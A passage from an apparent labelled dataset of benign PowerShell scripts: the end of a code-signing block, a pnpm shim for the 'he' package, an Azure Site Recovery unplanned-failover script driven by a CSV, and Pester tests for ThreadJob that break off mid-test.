# DwnU+h4t0xCSjLcY+3/aH92PuC34xu/HnL3Y14EjIlVldDBYYqGCF68wgherBgor
# BgEEAYI3AwMBMYIXmzCCF5cGCSqGSIb3DQEHAqCCF4gwgheEAgEDMQ8wDQYJYIZI
# AWUDBAIBBQAwggFZBgsqhkiG9w0BCRABBKCCAUgEggFEMIIBQAIBAQYKKwYBBAGE
# WQoDATAxMA0GCWCGSAFlAwQCAQUABCB3/GcW/Vz6s5o/Q3hSUO2UlhVhN/ej3znE
# zKCbEgH1MAIGZutC6/R9GBIyMDI0MTAyODExNDA0MC4zNVowBIACAfSggdmkgdYw
# gdMxCzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdS
# ZWRtb25kMR4wHAYDVQQKExVNaWNyb3NvZnQgQ29ycG9yYXRpb24xLTArBgNVBAsT
# JE1pY3Jvc29mdCBJcmVsYW5kIE9wZXJhdGlvbnMgTGltaXRlZDEnMCUGA1UECxMe
# blNoaWVsZCBUU1MgRVNOOjQwMUEtMDVFMC1EOTQ3MSUwIwYDVQQDExxNaWNyb3Nv
# ZnQgVGltZS1TdGFtcCBTZXJ2aWNloIIR/jCCBygwggUQoAMCAQICEzMAAAH+0KjC
# ezQhCwEAAQAAAf4wDQYJKoZIhvcNAQELBQAwfDELMAkGA1UEBhMCVVMxEzARBgNV
# BAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jv
# c29mdCBDb3Jwb3JhdGlvbjEmMCQGA1UEAxMdTWljcm9zb2Z0IFRpbWUtU3RhbXAg
# UENBIDIwMTAwHhcNMjQwNzI1MTgzMTE4WhcNMjUxMDIyMTgzMTE4WjCB0zELMAkG
# A1UEBhMCVVMxEzARBgNVBAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQx
# HjAcBgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEtMCsGA1UECxMkTWljcm9z
# b2Z0IElyZWxhbmQgT3BlcmF0aW9ucyBMaW1pdGVkMScwJQYDVQQLEx5uU2hpZWxk
# IFRTUyBFU046NDAxQS0wNUUwLUQ5NDcxJTAjBgNVBAMTHE1pY3Jvc29mdCBUaW1l
# LVN0YW1wIFNlcnZpY2UwggIiMA0GCSqGSIb3DQEBAQUAA4ICDwAwggIKAoICAQC8
# vCEXFaWoDjeiWwTg8J6BniZJ+wfZhNIoRi/wafffrYGZrJx1/lPe1DGk/c1abrZg
# dSJ4hBfD7S7iqVrLgA3ciicj7js2mL1+jnbF0BcxfSkatzR6pbxFY3dt/Nc8q/Ts
# 7XyLYeMPIu7LBjIoD0WZZt4+NqF/0zB3xCDKCQ+3AOtVAYvI6TIzdVOIcqqEa70E
# IZVF0db2WY8yutSU9aJhX0tUIHlVh34ARS11+oB2qXNXEDncSDFKqGnolt8QqdN1
# x8/pPwyKvQevBNO1XaHbIMG2NdtAhqrJwo5vrfcZ9GSfbXos4MGDfs//HCGh1dPz
# VkLZoc3t7EQOaZuJayyMa8UmSWLaDp23TV5KE6IaaFuievSpddwF6o1vpCgXyNf+
# 4NW1j2m8viPxoRZLj2EpQfSbOwK5wivBRL7Hwy5PS5/tVcIU0VuIJQ1FOh/EncHj
# nh4YmEvR/BRNFuDIJukuAowoOIJG5vrkOFp4O9QAAlP3cpIKh4UKiSU9q9uBDJqE
# ZkMv+9YBWNflvwnOGXL2AYJ0r+qLqL5zFnRLzHoHbKM9tl90FV8f80Gn/UufvFt4
# 4RMA6fs5P0PdQa3Sr4qJaBjjYecuPKGXVsC7kd+CvIA7cMJoh1Xa2O+QlrLao6cX
# sOCPxrrQpBP1CB8l/BeevdkqJtgyNpRsI0gOfHPbKQIDAQABo4IBSTCCAUUwHQYD
# VR0OBBYEFG/Oe4n1JTaDmX/n9v7kIGJtscXdMB8GA1UdIwQYMBaAFJ+nFV0AXmJd
# g/Tl0mWnG1M1GelyMF8GA1UdHwRYMFYwVKBSoFCGTmh0dHA6Ly93d3cubWljcm9z
# b2Z0LmNvbS9wa2lvcHMvY3JsL01pY3Jvc29mdCUyMFRpbWUtU3RhbXAlMjBQQ0El
# MjAyMDEwKDEpLmNybDBsBggrBgEFBQcBAQRgMF4wXAYIKwYBBQUHMAKGUGh0dHA6
# Ly93d3cubWljcm9zb2Z0LmNvbS9wa2lvcHMvY2VydHMvTWljcm9zb2Z0JTIwVGlt
# ZS1TdGFtcCUyMFBDQSUyMDIwMTAoMSkuY3J0MAwGA1UdEwEB/wQCMAAwFgYDVR0l
# AQH/BAwwCgYIKwYBBQUHAwgwDgYDVR0PAQH/BAQDAgeAMA0GCSqGSIb3DQEBCwUA
# A4ICAQCJPg1S87aXD7R0My2wG7GZfajeVVCqdCS4hMAYgYKAj6yXtmpk5MN3wurG
# wfgZYI9PO1ze2vwCAG+xgjNaMXCKgKMJA4OrWgExY3MSwrNyQfEDNijlLN7s4+Qw
# DcMDFWrhJJHzL5NELYZw53QlF5nWU+WGU+X1cj7Pw6C04+ZCcsuI/2rOlMfAXN76
# xupKfxx6R24xl0vIcmTc2LDcCeCVT9ZPMaxAB1yH1JVXgseJ9SebBN/SLTuIq1OU
# 2SrdvHWLJaDs3uMZkAFFZPaZf5gBUeUrbu32f5a1hufpw4k1fouwfzE9UFFgAhFW
# RawzIQB2g/12p9pnPBcaaO5VD3fU2HMeOMb4R/DXXwNeOTdWrepQjWt7fjMwxNHN
# lkTDzYW6kXe+Jc1HcNU6VL0kfjHl6Z8g1rW65JpzoXgJ4kIPUZqR9LsPlrI2xpnZ
# 76wFSHrYpVOWESxBEdlHAJPFuLHVjiInD48M0tzQd/X2pfZeJfS7ZIz0JZNOOzP1
# K8KMgpLEJkUI2//OkoiWwfHuFA1AdIxsqHT/DCfzq6IgAsSNrNSzMTT5fqtw5sN9
# TiH87/S+ZsXcExH7jmsBkwARMmxEM/EckKj/lcaFZ2D8ugnldYGs4Mvjhg2s3sVG
# ccQACvTqx+Wpnx55XcW4Mp0/mHX1ZScZbA7Uf9mNTM6hUaJXeDCCB3EwggVZoAMC
# AQICEzMAAAAVxedrngKbSZkAAAAAABUwDQYJKoZIhvcNAQELBQAwgYgxCzAJBgNV
# BAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4w
# HAYDVQQKExVNaWNyb3NvZnQgQ29ycG9yYXRpb24xMjAwBgNVBAMTKU1pY3Jvc29m
# dCBSb290IENlcnRpZmljYXRlIEF1dGhvcml0eSAyMDEwMB4XDTIxMDkzMDE4MjIy
# NVoXDTMwMDkzMDE4MzIyNVowfDELMAkGA1UEBhMCVVMxEzARBgNVBAgTCldhc2hp
# bmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBDb3Jw
# b3JhdGlvbjEmMCQGA1UEAxMdTWljcm9zb2Z0IFRpbWUtU3RhbXAgUENBIDIwMTAw
# ggIiMA0GCSqGSIb3DQEBAQUAA4ICDwAwggIKAoICAQDk4aZM57RyIQt5osvXJHm9
# DtWC0/3unAcH0qlsTnXIyjVX9gF/bErg4r25PhdgM/9cT8dm95VTcVrifkpa/rg2
# Z4VGIwy1jRPPdzLAEBjoYH1qUoNEt6aORmsHFPPFdvWGUNzBRMhxXFExN6AKOG6N
# 7dcP2CZTfDlhAnrEqv1yaa8dq6z2Nr41JmTamDu6GnszrYBbfowQHJ1S/rboYiXc
# ag/PXfT+jlPP1uyFVk3v3byNpOORj7I5LFGc6XBpDco2LXCOMcg1KL3jtIckw+DJ
# j361VI/c+gVVmG1oO5pGve2krnopN6zL64NF50ZuyjLVwIYwXE8s4mKyzbnijYjk
# lqwBSru+cakXW2dg3viSkR4dPf0gz3N9QZpGdc3EXzTdEonW/aUgfX782Z5F37Zy
# L9t9X4C626p+Nuw2TPYrbqgSUei/BQOj0XOmTTd0lBw0gg/wEPK3Rxjtp+iZfD9M
# 269ewvPV2HM9Q07BMzlMjgK8QmguEOqEUUbi0b1qGFphAXPKZ6Je1yh2AuIzGHLX
# pyDwwvoSCtdjbwzJNmSLW6CmgyFdXzB0kZSU2LlQ+QuJYfM2BjUYhEfb3BvR/bLU
# HMVr9lxSUV0S2yW6r1AFemzFER1y7435UsSFF5PAPBXbGjfHCBUYP3irRbb1Hode
# 2o+eFnJpxq57t7c+auIurQIDAQABo4IB3TCCAdkwEgYJKwYBBAGCNxUBBAUCAwEA
# ATAjBgkrBgEEAYI3FQIEFgQUKqdS/mTEmr6CkTxGNSnPEP8vBO4wHQYDVR0OBBYE
# FJ+nFV0AXmJdg/Tl0mWnG1M1GelyMFwGA1UdIARVMFMwUQYMKwYBBAGCN0yDfQEB
# MEEwPwYIKwYBBQUHAgEWM2h0dHA6Ly93d3cubWljcm9zb2Z0LmNvbS9wa2lvcHMv
# RG9jcy9SZXBvc2l0b3J5Lmh0bTATBgNVHSUEDDAKBggrBgEFBQcDCDAZBgkrBgEE
# AYI3FAIEDB4KAFMAdQBiAEMAQTALBgNVHQ8EBAMCAYYwDwYDVR0TAQH/BAUwAwEB
# /zAfBgNVHSMEGDAWgBTV9lbLj+iiXGJo0T2UkFvXzpoYxDBWBgNVHR8ETzBNMEug
# SaBHhkVodHRwOi8vY3JsLm1pY3Jvc29mdC5jb20vcGtpL2NybC9wcm9kdWN0cy9N
# aWNSb29DZXJBdXRfMjAxMC0wNi0yMy5jcmwwWgYIKwYBBQUHAQEETjBMMEoGCCsG
# AQUFBzAChj5odHRwOi8vd3d3Lm1pY3Jvc29mdC5jb20vcGtpL2NlcnRzL01pY1Jv
# b0NlckF1dF8yMDEwLTA2LTIzLmNydDANBgkqhkiG9w0BAQsFAAOCAgEAnVV9/Cqt
# 4SwfZwExJFvhnnJL/Klv6lwUtj5OR2R4sQaTlz0xM7U518JxNj/aZGx80HU5bbsP
# MeTCj/ts0aGUGCLu6WZnOlNN3Zi6th542DYunKmCVgADsAW+iehp4LoJ7nvfam++
# Kctu2D9IdQHZGN5tggz1bSNU5HhTdSRXud2f8449xvNo32X2pFaq95W2KFUn0CS9
# QKC/GbYSEhFdPSfgQJY4rPf5KYnDvBewVIVCs/wMnosZiefwC2qBwoEZQhlSdYo2
# wh3DYXMuLGt7bj8sCXgU6ZGyqVvfSaN0DLzskYDSPeZKPmY7T7uG+jIa2Zb0j/aR
# AfbOxnT99kxybxCrdTDFNLB62FD+CljdQDzHVG2dY3RILLFORy3BFARxv2T5JL5z
# bcqOCb2zAVdJVGTZc9d/HltEAY5aGZFrDZ+kKNxnGSgkujhLmm77IVRrakURR6nx
# t67I6IleT53S0Ex2tVdUCbFpAUR+fKFhbHP+CrvsQWY9af3LwUFJfn6Tvsv4O+S3
# Fb+0zj6lMVGEvL8CwYKiexcdFYmNcP7ntdAoGokLjzbaukz5m/8K6TT4JDVnK+AN
# uOaMmdbhIurwJ0I9JZTmdHRbatGePu1+oDEzfbzL6Xu/OHBE0ZDxyKs6ijoIYn/Z
# cGNTTY3ugm2lBRDBcQZqELQdVTNYs6FwZvKhggNZMIICQQIBATCCAQGhgdmkgdYw
# gdMxCzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdS
# ZWRtb25kMR4wHAYDVQQKExVNaWNyb3NvZnQgQ29ycG9yYXRpb24xLTArBgNVBAsT
# JE1pY3Jvc29mdCBJcmVsYW5kIE9wZXJhdGlvbnMgTGltaXRlZDEnMCUGA1UECxMe
# blNoaWVsZCBUU1MgRVNOOjQwMUEtMDVFMC1EOTQ3MSUwIwYDVQQDExxNaWNyb3Nv
# ZnQgVGltZS1TdGFtcCBTZXJ2aWNloiMKAQEwBwYFKw4DAhoDFQCEY0cP9rtDRtAt
# ZUb0m4bGAtFex6CBgzCBgKR+MHwxCzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNo
# aW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNyb3NvZnQgQ29y
# cG9yYXRpb24xJjAkBgNVBAMTHU1pY3Jvc29mdCBUaW1lLVN0YW1wIFBDQSAyMDEw
# MA0GCSqGSIb3DQEBCwUAAgUA6snSCDAiGA8yMDI0MTAyODA5MDQwOFoYDzIwMjQx
# MDI5MDkwNDA4WjB3MD0GCisGAQQBhFkKBAExLzAtMAoCBQDqydIIAgEAMAoCAQAC
# AgiwAgH/MAcCAQACAhLGMAoCBQDqyyOIAgEAMDYGCisGAQQBhFkKBAIxKDAmMAwG
# CisGAQQBhFkKAwKgCjAIAgEAAgMHoSChCjAIAgEAAgMBhqAwDQYJKoZIhvcNAQEL
# BQADggEBADNJzLXAFulwDG4ktiexNvYLVH/Vlc9FOtX7vDiLPH6hc4cBS71ocYbS
# pI4GOTtWDIK+MUyKtPXUcgsEFMdOIlwDXPlvk4h3KzRFZZycsJAZIoi2bwo02l4T
# 6gT2+JBEcwuxT/dvyG7NYQdMN447JzzA1UgkJw9cMZCDjZh/Woyqg+mrIKYxNKOf
# ddDSeWWY14YJ5SR0iw1OnAPiZttVc9Wr4ptW3+Nq0lnDditOePODWPkB2uiUD9o3
# cKMzSB/blfAMRNqfPsotseR/PmDEA3yolNhtI6jIZNivxyXlGquun7SPCmUr5L0V
# VSnBk20pTBhI2I5KwD1Llt8OY6Bx3yQxggQNMIIECQIBATCBkzB8MQswCQYDVQQG
# EwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwG
# A1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSYwJAYDVQQDEx1NaWNyb3NvZnQg
# VGltZS1TdGFtcCBQQ0EgMjAxMAITMwAAAf7QqMJ7NCELAQABAAAB/jANBglghkgB
# ZQMEAgEFAKCCAUowGgYJKoZIhvcNAQkDMQ0GCyqGSIb3DQEJEAEEMC8GCSqGSIb3
# DQEJBDEiBCC1pW64ou9ICus2dta9LP3JtwQ4Yg6417qYZONrOSi1CDCB+gYLKoZI
# hvcNAQkQAi8xgeowgecwgeQwgb0EIBGFzN38U8ifGNH3abaE9apz68Y4bX78jRa2
# QKy3KHR5MIGYMIGApH4wfDELMAkGA1UEBhMCVVMxEzARBgNVBAgTCldhc2hpbmd0
# b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3Jh
# dGlvbjEmMCQGA1UEAxMdTWljcm9zb2Z0IFRpbWUtU3RhbXAgUENBIDIwMTACEzMA
# AAH+0KjCezQhCwEAAQAAAf4wIgQgEdpvkq3zQZh4gWo+N1cBUbQciDORDclLAfrk
# pRpKe+gwDQYJKoZIhvcNAQELBQAEggIAkHcQ0CnXIP7YyWS4AmsAL1iai5WsO8Oh
# Z5WdWYcJfbrgzY8bmw0VQE/1r1ozZN0+mBS1XfHwdvvWfkpx5MS35GVkyRHYTRDB
# 0me6Ein5MbeiSUUpu8HnVAaKlNfVGFSJHi7NzkEIrkcS8dlIwV0o3mGVAcQdZSjl
# lq/vS2jh2DzSROvsy78v1GLPM/seiBOxBU3Mln14U31fnBPu+5Anrf8D1lRgS4km
# eVXwHoCEzUf/Wx2xye+ZN03WKDuAtJZedwlayNQsFxA3314GdNkVkSc1yFKFIRui
# Y/WilACb8VM4lcx+F9QJcCZu3zZZXMUUwsxnab73E/bIPGkxiPPo7MgYjNtbddzu
# MOyelt4daScaN5xLQ9k6vndZ33dBkvMHm6L2t9Y8bdVg8/ASn2UIOpEWq5PA4RrY
# qjbn7keAXMbDpwWePa4uUjvpQR8b8JzazHH/Zao1XjCTZfgS+X1UwAseMes0xJqV
# N5X/ASChbtvtaUxbN3F1jFO8Snuizy0RuzJbpveg6WC6297cts2Y/xZNCaLkABvR
# 8cExq9d7ckRCABdNyDWTN90Hy2wLNAWtLW+//IBMiKin3ZaTHmrl3Z1W1yd1Jtof
# cfsiKysZSD/26CxiQqQwCUR0ckLBHYp0lND8XuctoM2PjZeE3/2Z/dW9JNnENORG
# TJqE+IA7lHc=
# SIG # End signature block
|
combined_dataset/train/non-malicious/sample_26_55.ps1
|
sample_26_55.ps1
|
#!/usr/bin/env pwsh
$basedir=Split-Path $MyInvocation.MyCommand.Definition -Parent
$exe=""
$pathsep=":"
$env_node_path=$env:NODE_PATH
$new_node_path="C:\Users\abder\component-maker\web\node_modules\.pnpm\he@1.2.0\node_modules\he\bin\node_modules;C:\Users\abder\component-maker\web\node_modules\.pnpm\he@1.2.0\node_modules\he\node_modules;C:\Users\abder\component-maker\web\node_modules\.pnpm\he@1.2.0\node_modules;C:\Users\abder\component-maker\web\node_modules\.pnpm\node_modules"
if ($PSVersionTable.PSVersion -lt "6.0" -or $IsWindows) {
# Fix case when both the Windows and Linux builds of Node
# are installed in the same directory
$exe=".exe"
$pathsep=";"
} else {
$new_node_path="/mnt/c/Users/abder/component-maker/web/node_modules/.pnpm/he@1.2.0/node_modules/he/bin/node_modules:/mnt/c/Users/abder/component-maker/web/node_modules/.pnpm/he@1.2.0/node_modules/he/node_modules:/mnt/c/Users/abder/component-maker/web/node_modules/.pnpm/he@1.2.0/node_modules:/mnt/c/Users/abder/component-maker/web/node_modules/.pnpm/node_modules"
}
if ([string]::IsNullOrEmpty($env_node_path)) {
$env:NODE_PATH=$new_node_path
} else {
$env:NODE_PATH="$new_node_path$pathsep$env_node_path"
}
$ret=0
if (Test-Path "$basedir/node$exe") {
# Support pipeline input
if ($MyInvocation.ExpectingInput) {
$input | & "$basedir/node$exe" "$basedir/../../../../../he@1.2.0/node_modules/he/bin/he" $args
} else {
& "$basedir/node$exe" "$basedir/../../../../../he@1.2.0/node_modules/he/bin/he" $args
}
$ret=$LASTEXITCODE
} else {
# Support pipeline input
if ($MyInvocation.ExpectingInput) {
$input | & "node$exe" "$basedir/../../../../../he@1.2.0/node_modules/he/bin/he" $args
} else {
& "node$exe" "$basedir/../../../../../he@1.2.0/node_modules/he/bin/he" $args
}
$ret=$LASTEXITCODE
}
$env:NODE_PATH=$env_node_path
exit $ret
|
combined_dataset/train/non-malicious/995.ps1
|
995.ps1
|
Param(
[parameter(Mandatory=$true)]
$CsvFilePath
)
$ErrorActionPreference = "Stop"
$scriptsPath = $PSScriptRoot
if ($PSScriptRoot -eq "") {
$scriptsPath = "."
}
. "$scriptsPath\asr_logger.ps1"
. "$scriptsPath\asr_common.ps1"
. "$scriptsPath\asr_csv_processor.ps1"
Function ProcessItemImpl($processor, $csvItem, $reportItem) {
$reportItem | Add-Member NoteProperty "FailoverJobId" $null
$vaultName = $csvItem.VAULT_NAME
$sourceMachineName = $csvItem.SOURCE_MACHINE_NAME
$sourceConfigurationServer = $csvItem.CONFIGURATION_SERVER
$protectedItem = $asrCommon.GetProtectedItemFromVault($vaultName, $sourceMachineName, $sourceConfigurationServer)
if ($protectedItem -ne $null) {
if ($protectedItem.AllowedOperations.Contains('UnplannedFailover')) {
$processor.Logger.LogTrace("Starting UnplannedFailover operation for item '$($sourceMachineName)'")
$targetFailoverJob = Start-AzRecoveryServicesAsrUnplannedFailoverJob `
-ReplicationProtectedItem $protectedItem `
-Direction PrimaryToRecovery
$reportItem.FailoverJobId = $targetFailoverJob.ID
} else {
$processor.Logger.LogTrace("UnplannedFailover operation not allowed for item '$($sourceMachineName)'")
}
} else {
$processor.Logger.LogTrace("'$($sourceMachineName)' item is not in a protected state ready for replication")
}
}
Function ProcessItem($processor, $csvItem, $reportItem) {
try {
ProcessItemImpl $processor $csvItem $reportItem
}
catch {
$exceptionMessage = $_ | Out-String
$processor.Logger.LogError($exceptionMessage)
throw
}
}
$logger = New-AsrLoggerInstance -CommandPath $PSCommandPath
$asrCommon = New-AsrCommonInstance -Logger $logger
$processor = New-CsvProcessorInstance -Logger $logger -ProcessItemFunction $function:ProcessItem
$processor.ProcessFile($CsvFilePath)
|
combined_dataset/train/non-malicious/1777.ps1
|
1777.ps1
|
function Wait-ForJobRunning
{
param (
$job
)
$iteration = 10
Do
{
Start-Sleep -Milliseconds 100
}
Until (($job.State -match "Running|Completed|Failed") -or (--$iteration -eq 0))
if ($job.State -notmatch "Running|Completed|Failed")
{
throw ("Cannot start job '{0}'. Job state is '{1}'" -f $job,$job.State)
}
}
Describe 'Basic ThreadJob Tests' -Tags 'CI' {
BeforeAll {
$scriptFilePath1 = Join-Path $testdrive "TestThreadJobFile1.ps1"
@'
for ($i=0; $i -lt 10; $i++)
{
Write-Output "Hello $i"
}
'@ > $scriptFilePath1
$scriptFilePath2 = Join-Path $testdrive "TestThreadJobFile2.ps1"
@'
param ($arg1, $arg2)
Write-Output $arg1
Write-Output $arg2
'@ > $scriptFilePath2
$scriptFilePath3 = Join-Path $testdrive "TestThreadJobFile3.ps1"
@'
$input | foreach {
Write-Output $_
}
'@ > $scriptFilePath3
$scriptFilePath4 = Join-Path $testdrive "TestThreadJobFile4.ps1"
@'
Write-Output $using:Var1
Write-Output $($using:Array1)[2]
Write-Output @(,$using:Array1)
'@ > $scriptFilePath4
$scriptFilePath5 = Join-Path $testdrive "TestThreadJobFile5.ps1"
@'
param ([string]$param1)
Write-Output "$param1 $using:Var1 $using:Var2"
'@ > $scriptFilePath5
$WaitForCountFnScript = @'
function Wait-ForExpectedRSCount
{
param (
$expectedRSCount
)
$iteration = 20
while ((@(Get-Runspace).Count -ne $expectedRSCount) -and ($iteration-- -gt 0))
{
Start-Sleep -Milliseconds 100
}
}
'@
}
AfterEach {
Get-Job | Where-Object PSJobTypeName -eq "ThreadJob" | Remove-Job -Force
}
It 'ThreadJob with ScriptBlock' {
$job = Start-ThreadJob -ScriptBlock { "Hello" }
$results = $job | Receive-Job -Wait
$results | Should -Be "Hello"
}
It 'ThreadJob with ScriptBlock and Initialization script' {
$job = Start-ThreadJob -ScriptBlock { "Goodbye" } -InitializationScript { "Hello" }
$results = $job | Receive-Job -Wait
$results[0] | Should -Be "Hello"
$results[1] | Should -Be "Goodbye"
}
It 'ThreadJob with ScriptBlock and Argument list' {
$job = Start-ThreadJob -ScriptBlock { param ($arg1, $arg2) $arg1; $arg2 } -ArgumentList @("Hello","Goodbye")
$results = $job | Receive-Job -Wait
$results[0] | Should -Be "Hello"
$results[1] | Should -Be "Goodbye"
}
It 'ThreadJob with ScriptBlock and piped input' {
$job = "Hello","Goodbye" | Start-ThreadJob -ScriptBlock { $input | ForEach-Object { $_ } }
$results = $job | Receive-Job -Wait
$results[0] | Should -Be "Hello"
$results[1] | Should -Be "Goodbye"
}
It 'ThreadJob with ScriptBlock and Using variables' {
$Var1 = "Hello"
$Var2 = "Goodbye"
$Var3 = 102
$Var4 = 1..5
$global:GVar1 = "GlobalVar"
$job = Start-ThreadJob -ScriptBlock {
Write-Output $using:Var1
Write-Output $using:Var2
Write-Output $using:Var3
Write-Output ($using:Var4)[1]
Write-Output @(,$using:Var4)
Write-Output $using:GVar1
}
$results = $job | Receive-Job -Wait
$results[0] | Should -Be $Var1
$results[1] | Should -Be $Var2
$results[2] | Should -Be $Var3
$results[3] | Should -Be 2
$results[4] | Should -Be $Var4
$results[5] | Should -Be $global:GVar1
}
It 'ThreadJob with ScriptBlock and Using variables and argument list' {
$Var1 = "Hello"
$Var2 = 52
$job = Start-ThreadJob -ScriptBlock {
param ([string] $param1)
"$using:Var1 $param1 $using:Var2"
} -ArgumentList "There"
$results = $job | Receive-Job -Wait
$results | Should -Be "Hello There 52"
}
It 'ThreadJob with ScriptFile' {
$job = Start-ThreadJob -FilePath $scriptFilePath1
$results = $job | Receive-Job -Wait
$results | Should -HaveCount 10
$results[9] | Should -Be "Hello 9"
}
It 'ThreadJob with ScriptFile and Initialization script' {
$job = Start-ThreadJob -FilePath $scriptFilePath1 -Initialization { "Goodbye" }
$results = $job | Receive-Job -Wait
$results | Should -HaveCount 11
$results[0] | Should -Be "Goodbye"
}
It 'ThreadJob with ScriptFile and Argument list' {
$job = Start-ThreadJob -FilePath $scriptFilePath2 -ArgumentList @("Hello","Goodbye")
$results = $job | Receive-Job -Wait
$results[0] | Should -Be "Hello"
$results[1] | Should -Be "Goodbye"
}
It 'ThreadJob with ScriptFile and piped input' {
$job = "Hello","Goodbye" | Start-ThreadJob -FilePath $scriptFilePath3
$results = $job | Receive-Job -Wait
$results[0] | Should -Be "Hello"
$results[1] | Should -Be "Goodbye"
}
It 'ThreadJob with ScriptFile and Using variables' {
$Var1 = "Hello!"
$Array1 = 1..10
$job = Start-ThreadJob -FilePath $scriptFilePath4
$results = $job | Receive-Job -Wait
$results[0] | Should -Be $Var1
$results[1] | Should -Be 3
$results[2] | Should -Be $Array1
}
It 'ThreadJob with ScriptFile and Using variables with argument list' {
$Var1 = "There"
$Var2 = 60
$job = Start-ThreadJob -FilePath $scriptFilePath5 -ArgumentList "Hello"
$results = $job | Receive-Job -Wait
$results | Should -Be "Hello There 60"
}
It 'ThreadJob with terminating error' {
$job = Start-ThreadJob -ScriptBlock { throw "MyError!" }
$job | Wait-Job
$job.JobStateInfo.Reason.Message | Should -Be "MyError!"
}
It 'ThreadJob and Error stream output' {
$job = Start-ThreadJob -ScriptBlock { Write-Error "ErrorOut" } | Wait-Job
$job.Error | Should -Be "ErrorOut"
}
It 'ThreadJob and Warning stream output' {
$job = Start-ThreadJob -ScriptBlock { Write-Warning "WarningOut" } | Wait-Job
$job.Warning | Should -Be "WarningOut"
}
It 'ThreadJob and Verbose stream output' {
$job = Start-ThreadJob -ScriptBlock { $VerbosePreference = 'Continue'; Write-Verbose "VerboseOut" } | Wait-Job
$job.Verbose | Should Match "VerboseOut"
}
It 'ThreadJob and Verbose stream output' {
$job = Start-ThreadJob -ScriptBlock { $DebugPreference = 'Continue'; Write-Debug "DebugOut" } | Wait-Job
$job.Debug | Should -Be "DebugOut"
}
It 'ThreadJob ThrottleLimit and Queue' {
try
{
Get-Job | Where-Object PSJobTypeName -eq "ThreadJob" | Remove-Job -Force
$job1 = Start-ThreadJob -ScriptBlock { Start-Sleep -Seconds 60 } -ThrottleLimit 2
$job2 = Start-ThreadJob -ScriptBlock { Start-Sleep -Seconds 60 }
$job3 = Start-ThreadJob -ScriptBlock { Start-Sleep -Seconds 60 }
$job4 = Start-ThreadJob -ScriptBlock { Start-Sleep -Seconds 60 }
Wait-ForJobRunning $job2
Get-Job | Where-Object { ($_.PSJobTypeName -eq "ThreadJob") -and ($_.State -eq "Running") } | Should -HaveCount 2
Get-Job | Where-Object { ($_.PSJobTypeName -eq "ThreadJob") -and ($_.State -eq "NotStarted") } | Should -HaveCount 2
}
finally
{
Get-Job | Where-Object PSJobTypeName -eq "ThreadJob" | Remove-Job -Force
}
Get-Job | Where-Object PSJobTypeName -eq "ThreadJob" | Should -HaveCount 0
}
It 'ThreadJob Runspaces should be cleaned up at completion' {
$script = $WaitForCountFnScript + @'
try
{
Get-Job | Where-Object PSJobTypeName -eq "ThreadJob" | Remove-Job -Force
$rsStartCount = @(Get-Runspace).Count
$Job1 = Start-ThreadJob -ScriptBlock { "Hello 1!" } -ThrottleLimit 5
$job2 = Start-ThreadJob -ScriptBlock { "Hello 2!" }
$job3 = Start-ThreadJob -ScriptBlock { "Hello 3!" }
$job4 = Start-ThreadJob -ScriptBlock { "Hello 4!" }
$null = $job1,$job2,$job3,$job4 | Wait-Job
Wait-ForExpectedRSCount $rsStartCount
Write-Output (@(Get-Runspace).Count -eq $rsStartCount)
}
finally
{
Get-Job | Where-Object PSJobTypeName -eq "ThreadJob" | Remove-Job -Force
}
'@
$result = & "$PSHOME/pwsh" -c $script
$result | Should -BeExactly "True"
}
It 'ThreadJob Runspaces should be cleaned up after job removal' {
$script = $WaitForCountFnScript + @'
try {
Get-Job | Where-Object PSJobTypeName -eq "ThreadJob" | Remove-Job -Force
$rsStartCount = @(Get-Runspace).Count
$Job1 = Start-ThreadJob -ScriptBlock { Start-Sleep -Seconds 60 } -ThrottleLimit 2
$job2 = Start-ThreadJob -ScriptBlock { Start-Sleep -Seconds 60 }
$job3 = Start-ThreadJob -ScriptBlock { Start-Sleep -Seconds 60 }
$job4 = Start-ThreadJob -ScriptBlock { Start-Sleep -Seconds 60 }
Wait-ForExpectedRSCount ($rsStartCount + 4)
Write-Output (@(Get-Runspace).Count -eq ($rsStartCount + 4))
$job1 | Remove-Job -Force
$job3 | Remove-Job -Force
Wait-ForExpectedRSCount ($rsStartCount + 2)
Write-Output (@(Get-Runspace).Count -eq ($rsStartCount + 2))
}
finally
{
Get-Job | Where-Object PSJobTypeName -eq "ThreadJob" | Remove-Job -Force
}
Wait-ForExpectedRSCount $rsStartCount
Write-Output (@(Get-Runspace).Count -eq $rsStartCount)
'@
$result = & "$PSHOME/pwsh" -c $script
$result | Should -BeExactly "True","True","True"
}
It 'ThreadJob jobs should work with Receive-Job -AutoRemoveJob' {
Get-Job | Where-Object PSJobTypeName -eq "ThreadJob" | Remove-Job -Force
$job1 = Start-ThreadJob -ScriptBlock { 1..2 | ForEach-Object { Start-Sleep -Milliseconds 100; "Output $_" } } -ThrottleLimit 5
$job2 = Start-ThreadJob -ScriptBlock { 1..2 | ForEach-Object { Start-Sleep -Milliseconds 100; "Output $_" } }
$job3 = Start-ThreadJob -ScriptBlock { 1..2 | ForEach-Object { Start-Sleep -Milliseconds 100; "Output $_" } }
$job4 = Start-ThreadJob -ScriptBlock { 1..2 | ForEach-Object { Start-Sleep -Milliseconds 100; "Output $_" } }
$null = $job1,$job2,$job3,$job4 | Receive-Job -Wait -AutoRemoveJob
Get-Job | Where-Object PSJobTypeName -eq "ThreadJob" | Should -HaveCount 0
}
It 'ThreadJob jobs should run in FullLanguage mode by default' {
$result = Start-ThreadJob -ScriptBlock { $ExecutionContext.SessionState.LanguageMode } | Wait-Job | Receive-Job
